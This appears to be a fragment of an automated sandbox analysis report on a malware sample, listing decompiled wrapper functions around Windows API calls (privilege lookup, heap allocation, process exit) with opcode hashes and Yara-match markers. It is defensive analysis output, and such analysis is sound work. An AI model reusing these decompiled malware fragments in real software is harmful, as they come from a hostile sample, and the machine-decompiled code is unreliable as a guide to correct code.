                                                                                    • Instruction Fuzzy Hash: A4F0E931E842243AE72056555C03FFAB7589B80B11F14457FFE44B92C2E6A96C0686E6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 50%
                                                                                    			E00418621(void* __edx, intOrPtr* __esi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                    				char _v117;
                                                                                    
                                                                                    				if(__eflags > 0) {
                                                                                    					asm("adc al, 0x50");
                                                                                    					_push(_a16);
                                                                                    					_push(_a12);
                                                                                    					return  *((intOrPtr*)( *__esi))();
                                                                                    				} else {
                                                                                    					0x2e296bd8();
                                                                                    					_t4 =  &_v117;
                                                                                    					 *_t4 = _v117 - __dl;
                                                                                    					__eflags =  *_t4;
                                                                                    					__ebp = __esp;
                                                                                    					__eax = _a4;
                                                                                    					__esi = _a4 + 0xc8c;
                                                                                    					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
                                                                                    					__edx = _a16;
                                                                                    					__eax = _a12;
                                                                                    					__edx =  *__esi;
                                                                                    					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                    					__esi = __esi;
                                                                                    					__ebp = __ebp;
                                                                                    					return __eax;
                                                                                    				}
                                                                                    			}




                                                                                    0x00418628
                                                                                    0x0041860e
                                                                                    0x0041861a
                                                                                    0x0041861b
                                                                                    0x00418620
                                                                                    0x0041862a
                                                                                    0x0041862a
                                                                                    0x0041862f
                                                                                    0x0041862f
                                                                                    0x0041862f
                                                                                    0x00418631
                                                                                    0x00418633
                                                                                    0x00418642
                                                                                    0x0041864a
                                                                                    0x0041864f
                                                                                    0x00418652
                                                                                    0x0041865c
                                                                                    0x00418660
                                                                                    0x00418662
                                                                                    0x00418663
                                                                                    0x00418664
                                                                                    0x00418664

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                    • Instruction ID: 65204f1e0b89d90fab1e4f0e6e35f8594f9b64f63a7785db3f21326e2eb3355a
                                                                                    • Opcode Fuzzy Hash: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                    • Instruction Fuzzy Hash: E9F0CDB22002086FDB24DFA5DC80EEB77ACEF88310F14864EF94D97201C934E9008BB4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                    				int _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                                    				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}





                                                                                    0x0041864a
                                                                                    0x00418660
                                                                                    0x00418664

                                                                                    APIs
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LookupPrivilegeValue
                                                                                    • String ID:
                                                                                    • API String ID: 3899507212-0
                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                    • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                    				char _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                    				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}





                                                                                    0x004184df
                                                                                    0x004184e7
                                                                                    0x004184fd
                                                                                    0x00418501

                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                    • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                    				void* _t10;
                                                                                    				void* _t15;
                                                                                    
                                                                                    				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                    				return _t10;
                                                                                    			}





                                                                                    0x004184a7
                                                                                    0x004184bd
                                                                                    0x004184c1

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                    • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00418510(intOrPtr _a4, int _a8) {
                                                                                    				void* _t10;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                    				ExitProcess(_a8);
                                                                                    			}




                                                                                    0x00418513
                                                                                    0x0041852a
                                                                                    0x00418538

                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000001.220049197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                    • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                    • Instruction ID: bec34b670d5326920ac72b5bb9364ddcc73b5106a9da09ff301e3e43f2837250
                                                                                    • Opcode Fuzzy Hash: 00b65bfc2546c7fb5e612b5a7eb139199c874b73aebd579c023b783b112b30e5
                                                                                    • Instruction Fuzzy Hash: 66B09B729014C5C5D711E7604608F177A40F7E0741F16C1A6D1160645A4778C491F6B5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                    • Instruction ID: 784aaf75d6847e34398e7fdcc4e9fc29d16bea1a21f216775e5c3aa0b4e7d5c3
                                                                                    • Opcode Fuzzy Hash: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                    • Instruction Fuzzy Hash: A4D0A7329954344A8B204D38158A071BBE1F5A3015F0416E2CC889F809D103CC304289
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                    • Instruction ID: 9b49e9f2612febdfa1d12948025200cfe642975c734e1ab1fe035e9a54a9dba0
                                                                                    • Opcode Fuzzy Hash: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                    • Instruction Fuzzy Hash: 65C08C2BB4A14D4642204D4DB8020F1F7B9E687076B6432DEEE08A7501C812E01A0669
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                    • Instruction ID: 50bc09a2f097cf002c8ac8189eea195ba4731081e88d5350736586a12d43565a
                                                                                    • Opcode Fuzzy Hash: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                    • Instruction Fuzzy Hash: 49C08C33A2A1D949C111082D78422BCFB38D753124E1422CBEC88A7300C083C8068649
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                    • Instruction ID: 7095dbb79f45dd1ec694e3b8dbe0fbbaec5a427556b30f4bf89a83f16fc47c12
                                                                                    • Opcode Fuzzy Hash: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                    • Instruction Fuzzy Hash: 2FA00237F86B180C6C541CBA7C584F8D735E6C307AC553B77D60CB34404052D017015D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 12f045c0595c19dbb30295dcfca5e9d9415dae707dafcf0cd2b30421c450c596
                                                                                    • Instruction ID: 20c0013e4cd1359aae684b14b78851c1f127ae4f9f89c95a9ab49723440f9e44
                                                                                    • Opcode Fuzzy Hash: 12f045c0595c19dbb30295dcfca5e9d9415dae707dafcf0cd2b30421c450c596
                                                                                    • Instruction Fuzzy Hash: 1E90026230100402D20271598414A060149D7D1385F91C067E141455AD86658963F672
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 14f9e86300470081c8facd3dc193473a0df22a97ee3e966f525422412b0d02ea
                                                                                    • Instruction ID: 63f99b0d674ac81d3bf38e20db51b56a3edf71b3c4ff84b8454ac0bcc12a38cc
                                                                                    • Opcode Fuzzy Hash: 14f9e86300470081c8facd3dc193473a0df22a97ee3e966f525422412b0d02ea
                                                                                    • Instruction Fuzzy Hash: 9790027224100402D24171598404A060149E7D0381F91C067E0414559E86958A66FFA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bebdddbc068ce369b5dac3c8e5172e1f2527794e8bd59cc9225b1085713f4203
                                                                                    • Instruction ID: 3dbddf794afba81c44c28c25cb980badc96c5402067d843413583cfbe8018501
                                                                                    • Opcode Fuzzy Hash: bebdddbc068ce369b5dac3c8e5172e1f2527794e8bd59cc9225b1085713f4203
                                                                                    • Instruction Fuzzy Hash: 1D9002A2601140434640B15988048065155E7E1341391C176E0444565C86A88865E7A5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e913cba645df5e80872f3ed63ffeb5a6031cd80f27c29b16c04180fe86776e0a
                                                                                    • Instruction ID: 406d08f64e8848dec602c8f7a40d0a635c7d6cce58f028345a3f73dfed45f48c
                                                                                    • Opcode Fuzzy Hash: e913cba645df5e80872f3ed63ffeb5a6031cd80f27c29b16c04180fe86776e0a
                                                                                    • Instruction Fuzzy Hash: 4D9002A221100042D20471598404B060185D7E1341F51C067E2144559CC5698C71E665
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e113906c05106dfbbf6efb6eb133b80f94be2cc3dc0dd7556cdef690fbb2bfd
                                                                                    • Instruction ID: b0e347fbcd11820f2150d449757d304e0db0cfa081d1a5b4ecb426c29287905f
                                                                                    • Opcode Fuzzy Hash: 5e113906c05106dfbbf6efb6eb133b80f94be2cc3dc0dd7556cdef690fbb2bfd
                                                                                    • Instruction Fuzzy Hash: BF9002A220140403D24075598804A070145D7D0342F51C066E205455AE8A698C61F675
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a28a4a1f80b9f3600725db3aae8877a1f912ee27b4280a8cd32697210da5d225
                                                                                    • Instruction ID: 66aba26664d02903cc878db018010bd6dacddc2d626a6a2b9a5b5238fc89a7b7
                                                                                    • Opcode Fuzzy Hash: a28a4a1f80b9f3600725db3aae8877a1f912ee27b4280a8cd32697210da5d225
                                                                                    • Instruction Fuzzy Hash: 3290026220144442D24072598804F0F4245D7E1342F91C06EE4146559CC9558865EB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ad63946af98137fdc32b1c14bc2af2e39e2d626173fd5f492390499c24c9f38
                                                                                    • Instruction ID: 1083e50edfd0cfec3e4be60599149f06ff17f119c5ef41dd97a2e5de447651e2
                                                                                    • Opcode Fuzzy Hash: 5ad63946af98137fdc32b1c14bc2af2e39e2d626173fd5f492390499c24c9f38
                                                                                    • Instruction Fuzzy Hash: 0F90027220140402D20071598808B470145D7D0342F51C066E515455AE86A5C8A1FA71
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0987cae171aa0cc580c0edd7fc174cf94f7961ebd5e44e31266cb9782ef84d1
                                                                                    • Instruction ID: f1a317d6d1dccde1f773128cc36cfe63f63796f686cc8b92f53c68ee12a6e990
                                                                                    • Opcode Fuzzy Hash: b0987cae171aa0cc580c0edd7fc174cf94f7961ebd5e44e31266cb9782ef84d1
                                                                                    • Instruction Fuzzy Hash: C790027220144002D2407159C444A0B5145E7E0341F51C466E0415559C86558866E761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 79ee513206601ae415353f66d74dca995eeea7685af19bdb2402ba101698c94f
                                                                                    • Instruction ID: 797f062a68b118e25ed436665d71da6a02ec972351ae8c97e6adb8d70065bfeb
                                                                                    • Opcode Fuzzy Hash: 79ee513206601ae415353f66d74dca995eeea7685af19bdb2402ba101698c94f
                                                                                    • Instruction Fuzzy Hash: D090026224100802D2407159C414B070146D7D0741F51C066E0014559D86568975FBF1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2eb5cc55cad640328b70e009f6411a50be02670e4102d42e28c9b297e6035ad
                                                                                    • Instruction ID: dbd564510d8cc5b5ea6dd0ff6a0872af414804807870a3255de0f43b79aa3b16
                                                                                    • Opcode Fuzzy Hash: e2eb5cc55cad640328b70e009f6411a50be02670e4102d42e28c9b297e6035ad
                                                                                    • Instruction Fuzzy Hash: 8B90027220100802D20471598804A860145D7D0341F51C066E601465AE96A588A1F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e95b2cc5f4f65ccb024904f9f610888eead2e26c61720e7848bd14f40d246b05
                                                                                    • Instruction ID: 4d779861db5964789e9b13f8c9c1b49573af9a34d122c9d576d0f8a537852d80
                                                                                    • Opcode Fuzzy Hash: e95b2cc5f4f65ccb024904f9f610888eead2e26c61720e7848bd14f40d246b05
                                                                                    • Instruction Fuzzy Hash: 9C900272A0500012924071598814A464146E7E0781B55C066E0504559C89948A65E7E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 55c1c842c246035a76164a84f6f9365fc8314c9862a79ce4cfd780650a00f9ab
                                                                                    • Instruction ID: 6a54b09adfc92282c63f863b2d4d271f49a6a89c266aa3d08ad2f7948f1189e2
                                                                                    • Opcode Fuzzy Hash: 55c1c842c246035a76164a84f6f9365fc8314c9862a79ce4cfd780650a00f9ab
                                                                                    • Instruction Fuzzy Hash: AA9002E2201140924600B259C404F0A4645D7E0341B51C06BE1044565CC5658861E675
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7d377fe70321d85b9291d4986fd071992207a53c788f4030e98472e397c77b9
                                                                                    • Instruction ID: e1ec8df9d88e1edf4250959b0b18d41e182b4c96b34e0d365e9dcf9e80676cd2
                                                                                    • Opcode Fuzzy Hash: f7d377fe70321d85b9291d4986fd071992207a53c788f4030e98472e397c77b9
                                                                                    • Instruction Fuzzy Hash: CB900266221000020245B559460490B0585E7D6391391C06AF1406595CC6618875E761
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0d2d39294e962a940265c8cb1d250ff08b250474bc80130c146ddca644c8e95e
                                                                                    • Instruction ID: 2b3a7d4470e927c5b8e4605e76a40f80773cba7b26c722739e530fc170ac57e7
                                                                                    • Opcode Fuzzy Hash: 0d2d39294e962a940265c8cb1d250ff08b250474bc80130c146ddca644c8e95e
                                                                                    • Instruction Fuzzy Hash: 6E90027220100842D20071598404F460145D7E0341F51C06BE0114659D8655C861FA61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8de8c3e2b7110f91600c18ebe1ba9c63f93a81329dfec50901da90d15a7e24ef
                                                                                    • Instruction ID: 853d20fe102d55f7e5e7e6866bdf2e6186b940d0b47a555aad84562feb5793ed
                                                                                    • Opcode Fuzzy Hash: 8de8c3e2b7110f91600c18ebe1ba9c63f93a81329dfec50901da90d15a7e24ef
                                                                                    • Instruction Fuzzy Hash: 8890027260500802D25071598414B460145D7D0341F51C066E0014659D87958A65FBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f23d05395b891c108110ab10dfe98d2a7a79cd6ea43517ce68d480451eb5b3b
                                                                                    • Instruction ID: e665d327315db27d1d0d5b132f67013959f6fb2a9bfa7e05615000572b330870
                                                                                    • Opcode Fuzzy Hash: 1f23d05395b891c108110ab10dfe98d2a7a79cd6ea43517ce68d480451eb5b3b
                                                                                    • Instruction Fuzzy Hash: 1790027220504842D24071598404E460155D7D0345F51C066E0054699D96658D65FBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ffa011f01ba8babdbd1dc4e468e563cc4420735ab8ab0b38e4451f3f1bb9d772
                                                                                    • Instruction ID: 83c43cec20138a6d5d5bde28f187c28ede6aa48af992a785d12fae81c0b28d3f
                                                                                    • Opcode Fuzzy Hash: ffa011f01ba8babdbd1dc4e468e563cc4420735ab8ab0b38e4451f3f1bb9d772
                                                                                    • Instruction Fuzzy Hash: DF90026260500402D24071599418B060155D7D0341F51D066E0014559DC6998A65FBE1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 13aeca26aac1350e951a3d1d0c9e7698136053dbe26938b711397683e8717957
                                                                                    • Instruction ID: b610fec1819a9ef3e8eb13ccf47b36190989a9e05c45c9668b62d05e56b8b391
                                                                                    • Opcode Fuzzy Hash: 13aeca26aac1350e951a3d1d0c9e7698136053dbe26938b711397683e8717957
                                                                                    • Instruction Fuzzy Hash: 45900272301000529600B6999804E4A4245D7F0341B51D06AE4004559C85948871E661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2b162f70d94ad3e6a1319187714b5b8fbb560203fcdeff0e2cea3a9d79559ad2
                                                                                    • Instruction ID: 788ead8f971dbd97a7b350aff8d6c848248400e226522c855890a4550222a25e
                                                                                    • Opcode Fuzzy Hash: 2b162f70d94ad3e6a1319187714b5b8fbb560203fcdeff0e2cea3a9d79559ad2
                                                                                    • Instruction Fuzzy Hash: 1390026220504442D20075599408E060145D7D0345F51D066E105459ADC6758861F671
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8951c40522bb024f6abbbf45f6344cc39ef39280e1c7d746cf4bb763255f6fd6
                                                                                    • Instruction ID: 6c6d5667295ffc58270c185cfb94d1abf2c7a25e7164e03c6b7c77f90a975547
                                                                                    • Opcode Fuzzy Hash: 8951c40522bb024f6abbbf45f6344cc39ef39280e1c7d746cf4bb763255f6fd6
                                                                                    • Instruction Fuzzy Hash: 1390027620504442D60075599804E870145D7D0345F51D466E041459DD86948871F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275643619.0000000000B10000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af351b3dc3819f4b7935b9f08087173f95f00b7745675f2bb7c01b9fff801f31
                                                                                    • Instruction ID: e6f36cbfac4211b5b5c3108a56f94ed8490fb4c3c05dfa474a64df20f0018d37
                                                                                    • Opcode Fuzzy Hash: af351b3dc3819f4b7935b9f08087173f95f00b7745675f2bb7c01b9fff801f31
                                                                                    • Instruction Fuzzy Hash: 2290027220100403D20071599508B070145D7D0341F51D466E041455DDD6968861F661
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
